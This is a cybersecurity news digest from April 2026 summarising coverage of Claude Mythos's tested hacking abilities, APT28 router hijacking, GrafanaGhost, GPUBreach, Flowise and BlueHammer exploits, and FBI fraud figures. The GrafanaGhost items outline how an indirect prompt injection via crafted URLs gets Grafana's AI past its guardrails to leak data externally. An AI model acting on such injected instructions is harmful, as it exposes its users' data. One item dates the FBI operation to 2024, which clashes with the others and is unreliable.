2026-04-13 | Cyberscoop: Here’s how cyber heavyweights in the US and UK are dealing with Claude Mythos
A joint report from the Cloud Security Alliance, SANS Institute, and OWASP warns that organizations will struggle against AI-driven threats like Claude Mythos, which can exploit vulnerabilities faster than they can be patched. Mythos demonstrated improved capabilities in cyber range tests, solving 73% of expert-level problems and completing 24 of 32 steps in simulated attacks. Experts urge rapid AI adoption for defense, but caution that bureaucratic processes may hinder effective responses to emerging threats.
2026-04-13 | CSO Online: Anthropic’s Mythos signals a structural cybersecurity shift
Anthropic's Glasswing disclosure has sparked divided reactions regarding its AI's ability to autonomously identify and exploit vulnerabilities. A briefing by the Cloud Security Alliance, featuring insights from notable cybersecurity figures, offers a more nuanced perspective. Contributors include former CISA Director Jen Easterly and Bruce Schneier, emphasizing the implications of AI in cybersecurity and the need for a structured response to evolving threats.
2026-04-14 | Infosecurity Magazine: AI Security Institute Advocates Security Best Practices After Mythos Test
The AI Security Institute (AISI) emphasized the need for organizations to strengthen cybersecurity fundamentals after testing Anthropic's Claude Mythos Preview, which autonomously discovered vulnerabilities. Despite its capabilities, Mythos struggled in real-world simulations, completing only 22 of 32 attack steps on average. AISI warned that while it can exploit weak systems, its effectiveness against well-defended networks remains uncertain. Recommendations include regular updates, strong access controls, and leveraging AI for enhanced defense.
2026-04-14 | DIGIT: Is Mythos as Dangerous as Anthropic Claims?
Anthropic's Claude Mythos shows advanced cyber capabilities but has limitations, according to the AI Security Institute (AISI). In tests, Mythos completed 73% of expert-level capture-the-flag tasks but struggled in a 32-step corporate network attack simulation, succeeding only 3 out of 10 times. It failed to navigate operational technology environments, indicating potential weaknesses in multi-step attacks. AISI warns that Mythos could improve with more data, raising concerns about its future capabilities.
2026-04-14 | Help Net Security: Testing reveals Claude Mythos’s offensive capabilities and limits
Anthropic's Claude Mythos Preview, a large language model, was tested by the UK government's AI Security Institute for its offensive capabilities in cybersecurity. While it excels at identifying vulnerabilities and solving capture-the-flag challenges, it struggles with complex, multi-step attacks on well-defended networks. The model's ability to autonomously generate exploits necessitates shorter patch cycles and enhanced security practices. Organizations are advised to leverage AI for vulnerability discovery and incident response.
2026-04-14 | CSO Online: EU regulators largely denied access to Anthropic Mythos
European regulators have been largely excluded from early access to Anthropic's Mythos model, designed for cybersecurity applications. This AI technology can identify and exploit vulnerabilities more effectively than most humans, indicating a significant change for CISOs. Access is limited to select US tech companies like Apple, Microsoft, and Amazon under Project Glasswing for security assessments. The UK's AI Security Institute has begun testing, while only Germany has engaged in discussions with Anthropic without access.
UK exposes Russian cyber unit hacking home routers to hijack internet traffic
Date: 2026-04-07 | Source: Recorded Future
British security officials reported that Russian military intelligence hackers, linked to the group APT28, are exploiting vulnerable home and office routers to hijack internet traffic and conduct cyberespionage. The National Cyber Security Centre (NCSC) identified TP-Link routers as particularly at risk due to weak security settings. The hackers modify DNS settings to intercept sensitive data and redirect users. The NCSC recommends securing management interfaces, disabling weak protocols, and applying security updates.
2026-04-07 | DIGIT: Russian-State Hackers Are Hijacking UK Web Traffic, Warns NCSC
The UK’s National Cyber Security Centre (NCSC) warns that Russian cyber group APT28 has compromised routers to hijack internet traffic via DNS manipulation, intercepting credentials from users. This operation has been ongoing for at least two years, exploiting known vulnerabilities. The NCSC advises organizations to secure management interfaces, keep systems updated, and implement two-step verification to mitigate risks. APT28 is linked to Russia's GRU and has targeted various sectors previously.
2026-04-07 | Infosecurity Magazine: Russian APT28 Hackers Hijack Routers to Steal Credentials, UK Security Agency Warns
Russian hacking group APT28 has been hijacking vulnerable internet routers to steal credentials, as warned by the UK’s National Cyber Security Centre (NCSC) on April 7. The group exploits public vulnerabilities, modifying DNS settings on compromised TP-Link routers, particularly using CVE-2023-50224. This allows them to redirect traffic through malicious servers, enabling adversary-in-the-middle attacks to harvest sensitive information. APT28 is linked to the Russian GRU and has been active in this method since at least August 2025.
2026-04-07 | Help Net Security: Russian hackers hijack internet traffic using vulnerable routers
Russian state cyber group APT28 is exploiting vulnerable routers, such as the TP-Link WR841N (CVE-2023-50224), to hijack web traffic and spy on victims. By altering DHCP and DNS settings, attackers redirect traffic through their servers, enabling adversary-in-the-middle attacks to collect authentication data. The NCSC warns that this activity is opportunistic, with a wide net cast before focusing on specific targets. Organizations are urged to review the NCSC's advisory for mitigation strategies.
2026-04-07 | Cyber Security News: Russian Hackers Exploiting Home and Small-office Routers in Massive DNS hijacking Attack
A campaign by Russian threat actor Forest Blizzard targets home and small-office routers to hijack DNS traffic, compromising over 200 organizations and 5,000 devices since August 2025. The actor modifies router settings to redirect DNS queries to their servers, enabling passive observation of user traffic. For high-value targets, they conduct Adversary-in-the-Middle attacks on TLS connections, intercepting sensitive data. Microsoft recommends rebooting and updating router firmware, changing default credentials, and auditing DNS settings.
2026-04-07 | The Hacker News: Russian State-Linked APT28 Exploits SOHO Routers in Global DNS Hijacking Campaign
APT28, a Russian state-linked threat actor, has launched a global DNS hijacking campaign exploiting MikroTik and TP-Link routers since May 2025. Codenamed FrostArmada, the campaign modifies router DNS settings to capture authentication credentials via man-in-the-middle attacks. At its peak in December 2025, over 18,000 IP addresses from 120 countries were involved. The campaign targeted government agencies and third-party services, leveraging CVE-2023-50224 for exploitation. Microsoft and partners disrupted the infrastructure, but risks remain for broader compromises.
2026-04-07 | TechCrunch: Russian government hackers broke into thousands of home routers to steal passwords
Russian government hackers, identified as Fancy Bear (APT28), compromised thousands of home and small business routers globally to redirect internet traffic and steal passwords. Targeting unpatched MikroTik and TP-Link routers, they exploited known vulnerabilities. The campaign affected at least 18,000 victims across 120 countries, including government and law enforcement agencies. Microsoft reported over 200 organizations and 5,000 devices impacted. The FBI is expected to announce the takedown of domains used in this operation.
2026-04-07 | The Register: Russia's Fancy Bear still attacking routers to boost fake sites, NCSC warns
The UK's National Cyber Security Centre (NCSC) warns that Russia's Fancy Bear (APT28) is targeting SOHO routers to steal credentials by altering DNS settings, redirecting users to fake sites. Specifically, TP-Link and MikroTik routers are affected, with many compromised devices located in Ukraine. Microsoft reports over 200 organizations and 5,000 consumer devices impacted. NCSC urges organizations to follow mitigation advice to protect networks, highlighting the ongoing threat of sophisticated cyber actors.
2026-04-07 | Krebs on Security: Russia Hacked Routers to Steal Microsoft Office Tokens
Hackers linked to Russia's military intelligence, known as Forest Blizzard (APT28), exploited vulnerabilities in over 18,000 outdated routers to harvest Microsoft Office authentication tokens without deploying malware. This campaign targeted government agencies and third-party email providers, using DNS hijacking to redirect users to malicious servers. Microsoft reported over 200 organizations affected. The attackers gained access to accounts post-authentication, bypassing the need for phishing.
2026-04-07 | Cyberscoop: Feds quash widespread Russia-backed espionage network spanning 18,000 devices
Russian state-sponsored group Forest Blizzard (APT28) compromised over 18,000 routers in 120 countries for espionage, targeting sensitive networks. Exploiting vulnerabilities in TP-Link routers, they hijacked DNS settings to steal credentials and tokens. The FBI-led Operation Masquerade neutralized the threat, hardening compromised routers in the U.S. The campaign affected government and critical infrastructure sectors, but no U.S. agencies were compromised. The operation's communications have declined, indicating the threat has ceased.
2026-04-08 | Cyber Security News: FBI Disrupts Russian Router Hijacking Operation Compromised Thousands of Users
On April 7, 2026, the FBI announced the dismantling of a Russian cyberespionage network, “Operation Masquerade,” targeting compromised SOHO routers used by the GRU. The operation neutralized thousands of routers exploited since 2024 to redirect internet traffic and harvest sensitive data through AitM attacks. The FBI deployed remote commands to restore router settings and lock out attackers. Users are advised to replace unsupported routers, upgrade firmware, verify DNS settings, and review firewall rules.
2026-04-08 | Infosecurity Magazine: US Thwarts DNS Hijacking Network Controlled by Russian APT28 Hackers
On April 7, 2024, the US Department of Justice and FBI dismantled a DNS hijacking network controlled by Russian APT28, affecting routers across 23 states. The operation, named “Operation Masquerade,” involved resetting compromised TP-Link routers to legitimate DNS settings without impacting normal functionality. Users are advised to replace outdated routers, update firmware, verify DNS settings, and secure remote access. The campaign highlights ongoing threats from Russian military intelligence targeting US networks.
2026-04-08 | TechRadar: 'This puts organizations at risk of credential theft, data manipulation and broader compromise': UK government, Microsoft warn Russian hackers are hitting TP-Link home routers to hijack internet traffic
Russian state-sponsored group Forest Blizzard (APT28) is targeting TP-Link home routers to hijack DNS traffic, impacting over 200 organizations across various sectors since August 2025. The attackers exploit weak security in SOHO devices to conduct cyber-espionage and Adversary-in-the-Middle (AiTM) attacks, intercepting sensitive data. Microsoft recommends enforcing trusted DNS servers, implementing multifactor authentication, and monitoring identity activity to mitigate risks associated with these attacks.
2026-04-08 | CSO Online: Forest Blizzard leverages router compromises to launch AiTM attacks, target Outlook sessions
Russian threat actor Forest Blizzard exploits unsecured home and small-office routers to redirect traffic through attacker-controlled DNS servers, facilitating adversary-in-the-middle (AiTM) attacks on TLS connections targeting Microsoft Outlook. Over 200 organizations and 5,000 consumer devices have been impacted. This malicious DNS infrastructure is used to gather intelligence supporting Russian government objectives, with government, IT, telecommunications, and energy sectors as primary targets.
2026-04-08 | Ars Technica: Thousands of consumer routers hacked by Russia's military
The Russian military's APT28 group has hacked between 18,000 and 40,000 consumer routers, primarily from MikroTik and TP-Link, across 120 countries. This operation redirects users to sites that harvest credentials for espionage. APT28 exploited unpatched vulnerabilities in older router models to alter DNS settings, allowing them to proxy connections through malicious servers. Their tactics combine advanced tools with traditional methods, posing ongoing risks to global organizations.
2026-04-08 | The Guardian: Britons warned about Russian hackers targeting internet routers for espionage
Russian hackers are exploiting internet routers for espionage, as warned by the UK's National Cyber Security Centre. The attacks allow credential harvesting, redirection to fake sites, and access to home networks. The group behind the attacks is likely APT28, linked to Russian intelligence. The US has banned foreign-made consumer routers due to security risks. Experts advise keeping routers updated and monitoring network activities, as outdated devices can lead to significant vulnerabilities.
2026-04-08 | Hack Read: Russian Forest Blizzard Hackers Hijack Home Routers for Global Spying
A hacking group linked to Russian military intelligence, Forest Blizzard (Fancy Bear), has exploited thousands of home and small-office routers for global surveillance, as reported by Microsoft on April 7. This operation, ongoing since August 2025, involves DNS hijacking to intercept private data, targeting over 5,000 devices and 200 organizations, including three African government entities. Microsoft recommends multi-factor authentication, avoiding basic home routers for corporate tasks, and keeping devices updated to mitigate risks.
2026-04-08 | Malwarebytes Labs: Russian hacking group targets home and small office routers to spy on users
A Russian hacking group, APT28, is targeting home and small office routers to spy on users by altering DNS settings, enabling credential theft and interception of sensitive data. The FBI reports that APT28 has compromised over 200 organizations and 5,000 devices globally, focusing on military and critical infrastructure. A specific TP-Link model (WR841N) has a known vulnerability. Recommendations include changing default passwords, updating firmware, and checking DHCP settings to ensure security.
2026-04-08 | Cybersecurity Dive: US operation evicts Russia from hacked SOHO routers used to breach critical infrastructure
The U.S. Justice Department announced the termination of Russian GRU's access to hacked TP-Link SOHO routers used for DNS hijacking to steal sensitive data from governments and critical infrastructure. The FBI's "Operation Masquerade" reset compromised routers' DNS settings. Microsoft reported that the GRU had exploited these routers since at least 2024, conducting adversary-in-the-middle attacks on Outlook. Recommendations for router owners include firmware upgrades and monitoring DNS traffic.
2026-04-08 | Hack Read: Operation Masquerade: FBI Disrupts Russian Router Hacking Campaign
The FBI and DoJ disrupted a Russian cyberespionage campaign, Operation Masquerade, targeting home and small-office routers. The Russian GRU unit APT28 exploited vulnerabilities in TP-Link routers, hijacking thousands of devices across 23 states. They used DNS hijacking to serve fake login pages to steal sensitive information. The FBI reset DNS settings on infected routers and advised users to update firmware or replace outdated devices to mitigate risks.
2026-04-09 | Cyberscoop: Inside the FBI’s router takedown that cut off APT28’s ‘tremendous access’
The FBI's Operation Masquerade disrupted APT28, a Russian cyberespionage group, by targeting over 18,000 compromised TP-Link routers affecting 200 organizations globally. The operation reset DNS settings to prevent unauthorized access, as the attack was largely invisible to users and did not deploy traditional malware. This initiative aligns with the U.S. government's offensive cyber strategy to protect critical infrastructure. The FBI has conducted similar operations since 2018 to counter evolving threats from Russian hackers.
2026-04-09 | Tomsguide: ‘Don’t be a victim!’ NSA warns to reboot your router right now
The NSA warns Americans to reboot their routers to prevent attacks from Russian GRU cyber actors targeting home networks. APT28 (Fancy Bear) is exploiting vulnerabilities, including CVE-2023-50224 in TP-Link routers, to steal sensitive data. The NSA advises against using outdated routers and recommends keeping firmware updated, enabling firewalls, and using strong passwords. These measures enhance protection against potential data breaches and improve overall network performance.
Zero‑click Grafana AI attack can enable enterprise data exfiltration
Date: 2026-04-07 | Source: CSO Online
A new attack, GrafanaGhost, targets the Grafana platform, enabling data exfiltration without user interaction. This zero-click exploit leverages indirect prompt injection to bypass traditional security measures, allowing attackers to extract sensitive operational telemetry. The attack involves identifying injection points where user input can be stored and later processed by Grafana's AI, leading to unauthorized data leakage. Ram Varadarajan from Activio highlights the significant security risks posed by AI integration in such systems.
2026-04-07 | Cyberscoop: ‘GrafanaGhost’ bypasses Grafana’s AI defenses without leaving a trace
Security researchers at Noma Security disclosed a vulnerability named GrafanaGhost, which allows attackers to silently exfiltrate sensitive data from Grafana environments by exploiting multiple security bypasses. The attack does not require user interaction or credentials, using crafted URLs to inject malicious instructions that bypass Grafana's AI defenses. Noma found flaws in Grafana's security layers, making the exploit undetectable by traditional monitoring tools. Grafana Labs has issued a fix following responsible disclosure.
2026-04-07 | Infosecurity Magazine: GrafanaGhost Exploit Bypasses AI Guardrails for Silent Data Exfiltration
A critical vulnerability named GrafanaGhost has been discovered, allowing attackers to silently exfiltrate sensitive data from Grafana environments by bypassing client-side protections and AI guardrails. The exploit leverages multiple weaknesses in application logic, enabling unauthorized data transfers without user interaction. Attackers manipulate input processing, use indirect prompt injection, and disguise external domains as internal resources. Security teams are advised to implement network-level URL blocking and focus on runtime behavioral monitoring to mitigate this threat.
2026-04-07 | Hack Read: GrafanaGhost Vulnerability Allows Data Theft via AI Injection
A vulnerability named GrafanaGhost has been identified in Grafana, a platform used for monitoring sensitive data. This flaw allows attackers to exfiltrate data without user awareness by exploiting Indirect Prompt Injection, bypassing security measures. The attack utilizes protocol-relative URLs to trick the software into sending sensitive information to an external server. Experts express concerns over AI integration creating security blind spots, while others suggest the impact may vary based on a company's network defenses.
New GPUBreach Attack Enables Full CPU Privilege Escalation via GDDR6 Bit-Flips
Date: 2026-04-07 | Source: The Hacker News
New research has unveiled the GPUBreach attack, which exploits RowHammer vulnerabilities in GDDR6 memory to escalate privileges and potentially gain full control of a host system. By corrupting GPU page tables, unprivileged processes can achieve arbitrary memory access and escalate to root privileges via NVIDIA driver vulnerabilities. This attack bypasses IOMMU protections, posing significant risks to cloud AI and multi-tenant GPU environments. Temporary mitigation includes enabling ECC, though it may not fully protect against such attacks.
2026-04-07 | Security Affairs: GPUBreach exploit uses GPU memory bit-flips to achieve full system takeover
GPUBreach exploits GPU memory bit-flips to escalate privileges and potentially take full control of a system. It targets GPU page tables, allowing attackers to manipulate memory and gain arbitrary read/write access, leading to data theft and CPU-level privilege escalation, even with IOMMU enabled. This technique surpasses previous methods by exploiting vulnerabilities in the NVIDIA driver. Recommendations include enabling ECC on supported GPUs, though it is not foolproof against multi-bit flips.
2026-04-07 | Cyber Security News: New GPUBreach Attack Enables System-Wide Compromise Up to a Root Shell
A severe vulnerability named GPUBreach allows attackers to achieve full system compromise, including a root shell, by exploiting GPU Rowhammer techniques. Researchers from the University of Toronto demonstrated that GPUBreach can corrupt GPU page tables through targeted bit flips in GDDR6 memory, bypassing IOMMU defenses. This enables arbitrary access to GPU memory and can lead to severe consequences, including theft of cryptographic keys and degradation of AI model accuracy. The vulnerability was disclosed to major tech companies in November 2025.
2026-04-07 | Infosecurity Magazine: GPU Rowhammer Attack Enables Privilege Escalation and Full System Compromise
Researchers at the University of Toronto have demonstrated a GPU-based Rowhammer attack, named GPUBreach, that escalates privileges to achieve full system compromise. By corrupting GPU page tables through Rowhammer-induced bit flips in GDDR6 memory, an unprivileged CUDA kernel can gain arbitrary access to GPU memory, leading to CPU memory exploitation. This results in arbitrary data exposure, leakage of cryptographic keys, and manipulation of machine learning processes. Current defenses may need reassessment due to these vulnerabilities.
Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed
Date: 2026-04-07 | Source: The Hacker News
Threat actors are exploiting a critical vulnerability (CVE-2025-59528, CVSS 10.0) in Flowise, an AI platform, allowing remote code execution via a code injection flaw. This affects over 12,000 instances, enabling attackers to execute arbitrary JavaScript, compromising systems and accessing sensitive data. The issue was disclosed by Kim SooHyun and patched in version 3.0.6. VulnCheck reports exploitation activity from a single Starlink IP, highlighting the urgency for organizations to address this security risk.
2026-04-07 | Cyber Security News: Flowise AI Agent Builder Injection Vulnerability Exploited in Attacks, 15,000+ Instances Exposed
Threat actors are exploiting a critical remote code execution vulnerability (CVE-2025-59528) in Flowise, affecting over 15,000 instances. This flaw allows arbitrary JavaScript execution, leading to full system compromise. The vulnerability arises from improper input validation in the CustomMCP node, enabling attackers to execute OS commands via crafted HTTP POST requests. Organizations must upgrade to Flowise version 3.0.6 and restrict public API access to mitigate risks. Initial exploitation was detected in April 2026.
2026-04-07 | Security Affairs: Attackers exploit critical Flowise flaw CVE-2025-59528 for remote code execution
Attackers are exploiting a critical vulnerability in Flowise, tracked as CVE-2025-59528 (CVSS score 10), allowing remote code execution due to improper validation of user-supplied JavaScript. This flaw affects versions up to 3.0.5 and was patched in 3.0.6. Exploitation requires only an API token, posing significant risks to business operations and sensitive data. VulnCheck detected initial exploitation from a single Starlink IP, with 12,000–15,000 exposed instances online.
2026-04-08 | CSO Online: Hackers exploit a critical Flowise flaw affecting thousands of AI workflows
Hackers are exploiting a critical flaw in the Flowise low-code platform, allowing arbitrary JavaScript injection due to a design oversight in the custom MCP node. This vulnerability, rated at maximum severity, enables attackers to insert malicious code. A recent VulnCheck alert indicates that nearly 15,000 Flowise instances are exposed on the public internet, highlighting the urgent need for organizations using this platform to address the vulnerability.
2026-04-08 | TechRadar: Top open source AI platform Flowise hit by maximum-level security issue
Flowise, an open-source AI platform, has a CVSS-10 vulnerability (CVE-2025-59528) in version 3.0.5, allowing arbitrary code execution via the CustomMCP node. Discovered in September 2025, it has been exploited in the wild, with up to 15,000 instances potentially exposed. The flaw was fixed in version 3.0.6, with the latest being 3.1.1. Users are urged to update immediately and consider removing instances from public access to mitigate risks.
Researcher Released Windows Defender 0-Day Exploit Code, Allowing Attackers to Gain Full Access
Date: 2026-04-07 | Source: Cyber Security News
A security researcher, Chaotic Eclipse, has released a zero-day local privilege escalation exploit for Windows, named BlueHammer, allowing low-privileged users to gain SYSTEM-level access. The exploit affects Windows 11 (Build 10.0.26200.8037) and includes credential-harvesting capabilities. The researcher cited frustrations with Microsoft's Security Response Center as motivation for the uncoordinated disclosure. Mitigations include monitoring EDR tools and restricting user permissions. No patch or CVE has been issued yet.
2026-04-07 | Security Affairs: Experts published unpatched Windows zero-day BlueHammer
A researcher leaked the unpatched Windows zero-day "BlueHammer," allowing attackers to gain SYSTEM rights. Reported to Microsoft but criticized for the disclosure process, the exploit was published on GitHub on April 3, 2026. The local privilege escalation flaw can access the Security Account Manager (SAM) database, enabling full system compromise. Experts confirmed its legitimacy, noting that exploitation requires local access but poses significant risks through social engineering or credential theft. No patch is available.
2026-04-07 | Cyber Security News: BlueHammer PoC for Windows Defender Exploited by Researchers to Escalate Privileges
A proof-of-concept exploit named BlueHammer targets a zero-day local privilege escalation vulnerability in Microsoft Windows Defender. It exploits a TOCTOU race condition during the signature update process, allowing attackers to leak the Security Account Manager (SAM) database and potentially gain elevated privileges. Researchers recommend monitoring symbolic link creation and restricting local administrator accounts. Microsoft has not yet issued a patch, classifying BlueHammer as an active zero-day.
2026-04-07 | TechRadar: 'I was not bluffing Microsoft, and I'm doing it again': apparently disgruntled researcher leaks worrying Windows zero-day security flaw
A security researcher, known as Chaotic Eclipse, leaked exploit code for a Windows zero-day vulnerability named BlueHammer, which allows local privilege escalation to SYSTEM. The researcher criticized Microsoft's handling of vulnerability disclosures and noted that the exploit's reliability is uncertain. Microsoft reiterated its commitment to investigating security issues and supporting coordinated vulnerability disclosure. The flaw can only be exploited by local attackers, making it somewhat harder to leverage.
2026-04-08 | Help Net Security: BlueHammer: Windows zero-day exploit leaked
A proof-of-concept exploit for a Windows local privilege escalation vulnerability, named BlueHammer, has been leaked on GitHub. It allows attackers to extract NTLM password hashes and gain SYSTEM privileges. The exploit works on patched Windows 10, 11, and Server systems. Security experts recommend monitoring for unusual password changes and limiting user account privileges. Currently, there are no reports of active exploitation, but the potential for misuse exists. Microsoft has not yet commented on the situation.
Understanding Current Threats to Kubernetes Environments
Date: 2026-04-06 | Source: Palo Alto
The article discusses the rising threats to Kubernetes environments, noting a 282% increase in attacks, particularly targeting the IT sector. It highlights two case studies: one involving stolen service account tokens leading to a cryptocurrency exchange breach, and another exploiting the React2Shell vulnerability (CVE-2025-55182) for remote code execution. Recommendations include enforcing least privilege access, using short-lived tokens, and enhancing runtime monitoring to detect and mitigate threats effectively.
2026-04-07 | Cisco Talos: Year in Review: Vulnerabilities old and new and something React2
The Talos 2025 Year in Review highlights a significant rise in vulnerabilities, particularly React2Shell, which saw the highest attack percentage in late 2025. Legacy dependencies like Log4j and PHPUnit expanded the attack surface, with attackers focusing on remote code execution flaws and identity-related systems. Recommendations include evaluating identity-centric components and prioritizing patching of network devices to mitigate risks associated with outdated infrastructure and exposure vulnerabilities.
2026-04-07 | Cybersecurity Dive: React2Shell vulnerability helps hackers steal credentials, AI platform keys and other sensitive data
A cyber threat actor is exploiting the React2Shell vulnerability to conduct a credential-harvesting campaign, compromising at least 766 servers globally. The attackers upload a malicious payload to vulnerable React Server Components, enabling arbitrary code execution and automated extraction of sensitive data, including API keys, cloud tokens, and SSH keys. The harvested data is sent to a hacker-controlled server, NEXUS Listener, which allows easy access to the stolen information.
2026-04-07 | Cyber Security News: Hackers Exploit Next.js React2Shell Flaw to Steal Credentials From 766 Hosts in 24 Hours
Hackers are exploiting the critical React2Shell vulnerability (CVE-2025-55182) in Next.js applications, breaching 766 servers in 24 hours and stealing sensitive data, including passwords and cloud keys. The flaw allows code execution via a crafted HTTP request without authentication. Cisco Talos linked the attacks to threat cluster UAT-10608, utilizing a command-and-control framework called NEXUS Listener. Organizations are urged to patch vulnerabilities and rotate all secrets immediately to mitigate risks.
2026-04-07 | Cyber Security News: Hackers Exploit Kubernetes Misconfigurations to Move From Containers to Cloud Accounts
Threat actors are exploiting Kubernetes misconfigurations to transition from containers to cloud accounts, with a 282% increase in related attacks over the past year. In 2025, 22% of monitored cloud environments showed suspicious activity linked to service account token theft. Notable incidents include a North Korean group targeting a cryptocurrency exchange, using stolen tokens to access sensitive financial systems. Recommendations include enforcing strict RBAC policies, using short-lived tokens, and enabling Kubernetes audit logs for early detection of misuse.
FBI: Cyber fraud surges to $17.6 billion in losses as scams, crypto theft soar
Date: 2026-04-06 | Source: Recorded Future
In 2025, the FBI's Internet Crime Complaint Center reported $17.6 billion in losses from cyber-enabled fraud, accounting for 85% of total losses. Investment fraud led with $8.6 billion, followed by business email compromise at over $3 billion. Ransomware remains a significant threat, with 63 new variants identified and 3,611 complaints resulting in over $32 million in losses. AI-related complaints totaled approximately 22,000, with $893 million lost, and cryptocurrency theft accounted for over $11.3 billion.
2026-04-07 | Infosecurity Magazine: Over $17bn Lost to Cyber Fraud in the Last Year, Warns FBI
Cybercrime cost victims over $17.7 billion in 2025, according to the FBI's Internet Crime Report published on April 6. The report noted over a million complaints, with cryptocurrency scams causing $7.2 billion in losses, followed by Business Email Compromise at $3 billion and tech support scams at over $2 billion. For the first time, AI-enabled fraud was highlighted, resulting in nearly $893 million in losses. The FBI emphasized the need for vigilance against evolving cyber threats.
2026-04-07 | TechRadar: 'I can't think of anything that's off limits to them': FBI slams cybercriminals for attacking schools, hospitals, as crypto fraud soars
The FBI's 2025 Internet Crime Report reveals cybercriminals stole $17.6 billion, primarily through cyber-enabled fraud and investment scams. Ransomware attacks have increasingly targeted vulnerable sectors like hospitals and schools, with over 200 variants currently under investigation. The report noted 3,611 complaints leading to $32 million in losses, with critical infrastructure suffering at least 655 ransomware incidents totaling over $261 million in reported losses. Authorities managed to freeze approximately $146 million related to these cases.
2026-04-07 | Cyberscoop: Cybercrime losses jumped 26% to $20.9 billion in 2025
Cybercrime losses reached $20.9 billion in 2025, a 26% increase from 2024, according to the FBI's IC3 report. Investment-related fraud accounted for $8.65 billion, followed by business email compromise at $3.05 billion. Victims over 60 reported the highest losses, totaling $7.75 billion. Phishing was the most reported crime, with ransomware losses at $32.3 million. The report noted that all critical infrastructure sectors faced ransomware attacks, emphasizing the need for enhanced cybersecurity measures.
2026-04-07 | The Register: US cybercrime losses pass $20B for first time as AI boosts online fraud
Cybercrime losses in the US reached a record $20.87 billion in 2025, with over one million complaints filed, a 17% increase from 2024. Phishing topped the complaints, while investment scams caused the most financial damage at $8.6 billion. AI-related cybercrime reports numbered 22,364, leading to $893 million in losses. Notable AI uses included business email compromise and romance scams. Government impersonation scams surged by 128% from 2023 to 2025, highlighting evolving cyber threats.
2026-04-07 | Help Net Security: Cybercrime losses break the $20 billion mark
Cybercrime losses reached $20.877 billion in 2025, a 26% increase from the previous year, according to the FBI's IC3 report. Over one million complaints were filed, with cyber-enabled fraud causing $17.7 billion in losses. Phishing incidents topped the complaint list at 191,561. Investment scams, particularly involving cryptocurrency, accounted for $8.6 billion. AI-related fraud linked to over 22,000 complaints resulted in nearly $893 million in losses. Ransomware losses exceeded $32 million, with ongoing threat development noted.
2026-04-08 | Risky.Biz: Risky Bulletin: Cybercrime losses passed $20 billion last year
Americans lost nearly $21 billion to cybercrime in the past year, according to the FBI's Internet Crime Report. Investment scams topped the losses at $8.6 billion, with $6.2 billion in cryptocurrency. Cyber-enabled fraud accounted for 85% of total losses. The FBI received over one million cybercrime reports for the first time, averaging over 3,000 daily. The report influences law enforcement and legislative actions against cyber scams, with international pressure on countries harboring cybercriminals.
2026-04-08 | CNET: Crypto Scams and Senior Fraud Drive $21 Billion in 2025 Cyber Theft, FBI Reports
In 2025, the FBI reported over $21 billion in cyber theft, with more than 1 million complaints. Phishing and extortion were the top crime types. The over-60 demographic faced $7.75 billion in losses, while cryptocurrency-related scams accounted for over $11 billion. AI's role in scams is increasing, with 22,364 complaints costing $893 million. The FBI's IC3 Recovery Asset Team froze $679 million in assets from attempted thefts, and a new Scam Center Strike Force targets cryptocurrency fraud.
Inside an AI-enabled device code phishing campaign
Date: 2026-04-06 | Source: Microsoft Security
Microsoft Defender Security Research identified a sophisticated phishing campaign exploiting Device Code Authentication to compromise organizational accounts. This campaign utilized AI for dynamic code generation, bypassing the 15-minute expiration window. Threat actors employed automation to create personalized phishing emails and leveraged legitimate platforms for redirection. Post-compromise, they focused on high-value targets, utilizing Microsoft Graph for reconnaissance and establishing persistence through malicious inbox rules. Recommendations include enforcing MFA and blocking legacy authentication.
2026-04-07 | Help Net Security: AI-enabled device code phishing campaign exploits OAuth flow for account takeover
A phishing campaign exploiting the OAuth Device Code Authentication flow has been identified, allowing attackers to bypass MFA and compromise accounts. This automated attack uses AI to generate device codes, enabling unauthorized access without credential exposure. Threat actors employ deceptive emails and legitimate-looking interfaces to lure users. Once a user authenticates, attackers can register new devices for persistence and exfiltrate sensitive data. The campaign's reconnaissance phase occurs 10-15 days prior to the phishing attempt.
2026-04-07 | The Register: Hundreds of orgs compromised daily in Microsoft device code phishing attacks
A Microsoft device-code phishing campaign has compromised hundreds of organizations daily since March 15, 2026. Attackers utilize AI for hyper-personalized phishing emails and employ dynamic device code generation to bypass multi-factor authentication (MFA). The campaign targets finance-related accounts, exfiltrating sensitive data. Microsoft recommends limiting device code flow usage and training employees to recognize phishing attempts. The attack's sophistication marks a significant escalation in threat actor tactics.
2026-04-08 | Cyber Security News: Hackers Used EvilTokens, ClickFix Campaign to Attack Claude Code Users with AMOS Stealer
Hackers launched two campaigns in March 2026 targeting enterprise accounts and macOS users. The EvilTokens campaign exploits Microsoft’s OAuth 2.0 Device Code flow, bypassing MFA and allowing attackers to gain access to Microsoft 365 applications. Over 180 phishing URLs were detected, primarily affecting sectors in the U.S. and India. Simultaneously, the ClickFix campaign targeted macOS developers, using fake documentation to execute the AMOS Stealer, compromising sensitive data and establishing persistent access. Recommendations include auditing sign-in logs and blocking unsigned scripts.
Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations
Date: 2026-04-06 | Source: Microsoft Security
Storm-1175 is a financially motivated cybercriminal group that conducts rapid ransomware operations, primarily targeting vulnerable web-facing assets. They exploit N-day vulnerabilities, often within days of disclosure, and have been observed using zero-day exploits. Recent attacks have impacted healthcare, education, and finance sectors in Australia, the UK, and the US. Storm-1175 employs various techniques for initial access, lateral movement, credential theft, and ransomware deployment, notably using Medusa ransomware.
2026-04-07 | The Hacker News: China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware
A China-based threat actor, Storm-1175, is exploiting zero-day and N-day vulnerabilities to deploy Medusa ransomware in rapid attacks against healthcare, education, professional services, and finance sectors in Australia, the UK, and the US. The group has exploited over 16 vulnerabilities since 2023, including CVE-2025-10035 and CVE-2026-23760 as zero-days. Tactics include using living-off-the-land binaries, modifying firewall policies, and leveraging RMM tools for covert operations, complicating detection efforts.
2026-04-07 | Cyber Security News: Microsoft Warns Storm-1175 Exploits Web-Facing Assets 0-Day Flaws in Medusa Ransomware Attacks
A new ransomware campaign by the threat group Storm-1175 targets vulnerable, internet-facing systems using Medusa ransomware. The group exploits N-day vulnerabilities, acting swiftly within 24 hours of a flaw's disclosure. They have also utilized zero-day vulnerabilities, such as CVE-2026-23760 and CVE-2025-10035. Storm-1175 employs a double extortion model, encrypting and stealing data. Microsoft advises organizations to patch vulnerabilities within 72 hours and monitor for signs of credential theft and unauthorized changes.
2026-04-07 | Infosecurity Magazine: Storm-1175 Exploits Flaws in High-Velocity Medusa Attacks
